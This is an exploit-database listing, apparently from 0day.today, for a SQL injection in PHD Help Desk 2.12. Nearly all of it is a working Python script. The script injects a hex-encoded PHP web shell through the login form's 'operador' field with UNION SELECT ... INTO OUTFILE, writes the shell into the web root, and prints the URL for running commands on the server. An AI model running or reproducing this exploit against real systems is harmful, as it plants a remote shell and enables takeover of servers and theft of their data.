[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHD Help Desk 2.12 - SQL Injection Vulnerability

Author
drone
Risk
[
Security Risk High
]
0day-ID
0day-ID-20843
Category
web applications
Date add
03-06-2013
Platform
php
from argparse import ArgumentParser
import string
import random
import urllib, urllib2
import sys
 
def run(options):
    print '[!] Dropping web shell on %s...'%(options.ip)
 
    shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
 
    # <? php system($_GET["rr"]); ?>
    data = urllib.urlencode({'operador':('\' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e'
                                    ',null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE'
                                        ' \'{0}/{1}.php'.format(options.path,shell)),
                             'contrasenia':'pass',
                             'submit':'Enter',
                             'captcha':''})
 
    urllib2.urlopen('http://{0}{1}/login.php'.format(options.ip, options.rootp), data)
    print '[!] Shell dropped.  http://%s%s/%s.php?rr=ls'%(options.ip,options.rootp,shell)
 
def parse():
    parser = ArgumentParser()
    parser.add_argument('-i',help='server address',action='store',dest='ip')
    parser.add_argument('-p',help='path to login.php (/phd_2_12)',action='store',
                default='/phd_2_12', dest='rootp')
    parser.add_argument('-w',help='writable web path (/var/www/phd_2_12) for shell',
                default='/var/www/phd_2_12/', action='store', dest='path')
 
    options = parser.parse_args()
    if not options.ip:
        parser.print_help()
        sys.exit(1)
 
    options.path = options.path if options.path[-1] != '/' else options.path[:-1]
    options.rootp = options.rootp if options.path[-1] != '/' else options.path[:-1]
    return options
 
if __name__=="__main__":
    run(parse())

#  0day.today [2024-12-25]  #